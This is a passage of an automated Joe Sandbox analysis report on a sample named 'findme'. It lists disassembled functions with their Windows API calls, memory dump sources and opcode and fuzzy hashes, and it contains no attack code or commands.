                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: f8971ed589b2ede2fe48bb9dcac7403f93c86a71931bd558b7f3e22a00b30214
                    • Instruction ID: 422f7d56235c1180f06a696fdaa298298e542883a6789f5d6d23b90110ca3920
                    • Opcode Fuzzy Hash: f8971ed589b2ede2fe48bb9dcac7403f93c86a71931bd558b7f3e22a00b30214
                    • Instruction Fuzzy Hash: 2AC1A378A042449FDF54DF68C484FAA7BA1AF06304F1840BFEC469B363DB399944CB69
                    Function 004C3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 27b9ce0ab56df0a617f52337b7dff5d2f5f094a8f2cdf60b216350d8b2e83d18
                    • Instruction ID: 4dfb4a1da9feffaa99798334864360b2b0abcb9795e99080635932340f14c1a3
                    • Opcode Fuzzy Hash: 27b9ce0ab56df0a617f52337b7dff5d2f5f094a8f2cdf60b216350d8b2e83d18
                    • Instruction Fuzzy Hash: F671D079100F44AADB61DF30CC41FEBB7E8AB14306F44895FE5AB47242DA3A6A48CF15
                    Function 004C837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C8384
                      • Part of subcall function 004C1380: __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C1380: new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004C19A6: __EH_prolog.LIBCMT ref: 004C19AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 731c658ce46938712a9a42c92d7c8bc5262f86fb0ca8ffd0c959cfad211d895b
                    • Instruction ID: 21c849af14914a7a1b08098c5766fcb7990cdcc1d0a8b52966efd15ce5616473
                    • Opcode Fuzzy Hash: 731c658ce46938712a9a42c92d7c8bc5262f86fb0ca8ffd0c959cfad211d895b
                    • Instruction Fuzzy Hash: 8441D635800654AADB64DB61C855FEA73A8AF10308F0440EFE54A93193EF795AC9DB58
                    Function 004C1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1E05
                      • Part of subcall function 004C3B3D: __EH_prolog.LIBCMT ref: 004C3B42
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: a11f90a8d9a19f8fe5c4529c391102ff46c6c2bc1daeda8726ae7e1f3cd8ffd6
                    • Instruction ID: ef1a7b18ef72a68836240a297ce0a1b34b04ba090573afb72d8eac713888321d
                    • Opcode Fuzzy Hash: a11f90a8d9a19f8fe5c4529c391102ff46c6c2bc1daeda8726ae7e1f3cd8ffd6
                    • Instruction Fuzzy Hash: 1F213935904148AFCB51EF9AD951EEEBBF5BF59304B1000AFE845A7262CB365E10CB68
                    Function 004DA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004DA7C8
                      • Part of subcall function 004C1380: __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C1380: new.LIBCMT ref: 004C13FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: e37cab2c85a1f48a764c78f6ad1d56ba80def44231cd041c60d9c3fe34ddeb79
                    • Instruction ID: bccf4dcbef2b1475e4349e3a1f6b3c33fad9df79ddfdf3e1be1e973a764f1af5
                    • Opcode Fuzzy Hash: e37cab2c85a1f48a764c78f6ad1d56ba80def44231cd041c60d9c3fe34ddeb79
                    • Instruction Fuzzy Hash: 0F21AD75C04249AECF10EF56C8519EEB7B4EF1A304F0004AFE809A3312DB396E06DB65
                    Function 004C92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: cf5fc5a2d3957f1b11153db433ed4de9adfecf54f6fc0c2ad66d2467767b4b42
                    • Instruction ID: 398661a5644dbf4f690c836778117a34de9e790ca73704eca855a46641792737
                    • Opcode Fuzzy Hash: cf5fc5a2d3957f1b11153db433ed4de9adfecf54f6fc0c2ad66d2467767b4b42
                    • Instruction Fuzzy Hash: 9111C67BD00528A7CB51AA99CC85FEEB731AF48710F00411FFC04A7261CB398D1186A8
                    Function 004CAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                    • Instruction ID: 43b8a20c50ce8f8f1fce569f6e2017aaa34851fa27a256802f31446853d8db41
                    • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                    • Instruction Fuzzy Hash: 2FF081785007099FDBB0DA65C941B1677E4EB11328F20891FD496C6780E77AE8A4C75A
                    Function 004C5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C5BDC
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: a968ae61fda1e9ec9f872076337a68f069d0d6066d8fc54cb45f0f837f936da7
                    • Instruction ID: 95793bfa1f8e933aa37680aefd91cf0b007b37034b44fee83ba050376980c380
                    • Opcode Fuzzy Hash: a968ae61fda1e9ec9f872076337a68f069d0d6066d8fc54cb45f0f837f936da7
                    • Instruction Fuzzy Hash: E301A238900644DAC724F7A9C055BDDF7A49F19308F80809FA85A13283CBBC2B08C656
                    Function 004E8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: be7fa94c4bcffdfa1d9c7e855c9fa6a01b1989a18fe9825bed7b170eb3913f99
                    • Instruction ID: 080e5b9a993550990a39424725db33ba314661b80e882eb906feb7c9dc023978
                    • Opcode Fuzzy Hash: be7fa94c4bcffdfa1d9c7e855c9fa6a01b1989a18fe9825bed7b170eb3913f99
                    • Instruction Fuzzy Hash: 35E0A0619402E17AEF312B6B5C00B5B7B889B513B3F15022BAC5DA6291CE288C0187ED
                    Function 004CA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004CA4F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 8a7de5cc7ffab4c93712794a490df1124f94c4d3ad95ffa04707bd1fbad1b61c
                    • Instruction ID: 52b64916621a4448631461aec276646ed756c9b1c54b17e52cc0f96ed1324531
                    • Opcode Fuzzy Hash: 8a7de5cc7ffab4c93712794a490df1124f94c4d3ad95ffa04707bd1fbad1b61c
                    • Instruction Fuzzy Hash: 7DF0E939408384BACBA21B788804FD7BB91AF05339F04CA0FF1FD12192C67C14A5972B
                    Function 004D067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                    Download Yara Rule
                    APIs
                    • SetThreadExecutionState.KERNEL32(00000001), ref: 004D06B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExecutionStateThread
                    • String ID:
                    • API String ID: 2211380416-0
                    • Opcode ID: 9e2193fea499e760f338acada6ba2ee1626ed0bbc956bc21883f79816c12aecb
                    • Instruction ID: 93de9fa712d58b4f32e33fa923e7cd478cff904706da00aaa2fc06ff32e6205e
                    • Opcode Fuzzy Hash: 9e2193fea499e760f338acada6ba2ee1626ed0bbc956bc21883f79816c12aecb
                    • Instruction Fuzzy Hash: 17D02B2420411039E621337AA859BFF1A060FC7719F09002FB90D133D78F4E0886E2EE
                    Function 004D9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GdipAlloc.GDIPLUS(00000010), ref: 004D9D81
                      • Part of subcall function 004D9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004D9B30
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Gdip$AllocBitmapCreateFromStream
                    • String ID:
                    • API String ID: 1915507550-0
                    • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                    • Instruction ID: ec9df2d498deb53398462a7e6a3dd53f044a74482a6fb7d2e9ab6dde84648400
                    • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                    • Instruction Fuzzy Hash: 82D0C73075420D7ADF41BAB69C2297A7BA9EB01350F10416FBC4CC6351EE76DE10A66A
                    Function 004C9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • GetFileType.KERNELBASE(000000FF,004C9887), ref: 004C9995
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 4c266ac6c39dc4d95de01c72ca6af9df5487e02e9c9e612bcc16d2a911d020ff
                    • Instruction ID: 37bebad12551e147e2bb3d0b8f6d01d3920667afd6d915997af2c6791bedfba7
                    • Opcode Fuzzy Hash: 4c266ac6c39dc4d95de01c72ca6af9df5487e02e9c9e612bcc16d2a911d020ff
                    • Instruction Fuzzy Hash: 6CD0C9B5011180B58FA14A34490DAAA7651DA83366B28C6FED025C42A5DB36CC03F546
                    Function 004DD41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 004DD43F
                      • Part of subcall function 004DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                      • Part of subcall function 004DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                      • Part of subcall function 004DAC74: IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                      • Part of subcall function 004DAC74: TranslateMessage.USER32(?), ref: 004DACB8
                      • Part of subcall function 004DAC74: DispatchMessageW.USER32(?), ref: 004DACC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                    • String ID:
                    • API String ID: 897784432-0
                    • Opcode ID: 0d020d41250071bec11da666d6a348b8fc0ab9341f55fb89353602907846b085
                    • Instruction ID: 9ce025fb74a2b8126bb5e3001015663878ed8d3c09ccf14e5152fbdf0a858633
                    • Opcode Fuzzy Hash: 0d020d41250071bec11da666d6a348b8fc0ab9341f55fb89353602907846b085
                    • Instruction Fuzzy Hash: C0D09E35144300BBDA112B52CE07F1F7AA6AB99B08F004559B344740B286669D35EB16
                    Function 004DD8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 21a9d7388030fe60fd60a5ffc829a71029be6aae92c8ecfdecc0db22215b0212
                    • Instruction ID: fe7830d33ffd9de74132cbc984e9cb2d390095b1f2ea3a78fd1edd38e5364181
                    • Opcode Fuzzy Hash: 21a9d7388030fe60fd60a5ffc829a71029be6aae92c8ecfdecc0db22215b0212
                    • Instruction Fuzzy Hash: A4B09295A680016C21096205A926E360258C882B14B30801FB109E12C0D448681A543A
                    Function 004DD8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 744f95a4f12dc1b233a10332da6abca4fbcb458ee1d244be7929baa57f1a9ff1
                    • Instruction ID: 204246aec8c21167e5162427cf4526837bb10f37f3aa264040387f26fefef908
                    • Opcode Fuzzy Hash: 744f95a4f12dc1b233a10332da6abca4fbcb458ee1d244be7929baa57f1a9ff1
                    • Instruction Fuzzy Hash: EBB012D5A6C1017C31497205FC26E36025CC8C3B14B30811FB109D13C0D4486C9A543F
                    Function 004DD8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 57542f1f855c9c3b1e1c2b47d2e1fe67514bbbacf666308f50230dbdbf7eee0c
                    • Instruction ID: e04ffbb75ec960e74a2456fd9f0c2618bbf96ee211bebfac8107bafc771434da
                    • Opcode Fuzzy Hash: 57542f1f855c9c3b1e1c2b47d2e1fe67514bbbacf666308f50230dbdbf7eee0c
                    • Instruction Fuzzy Hash: 71B012E5A6C0017C31097205FC26E36025CC8C3B14730801FB50DD12C0D4486C05943F
                    Function 004DD8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
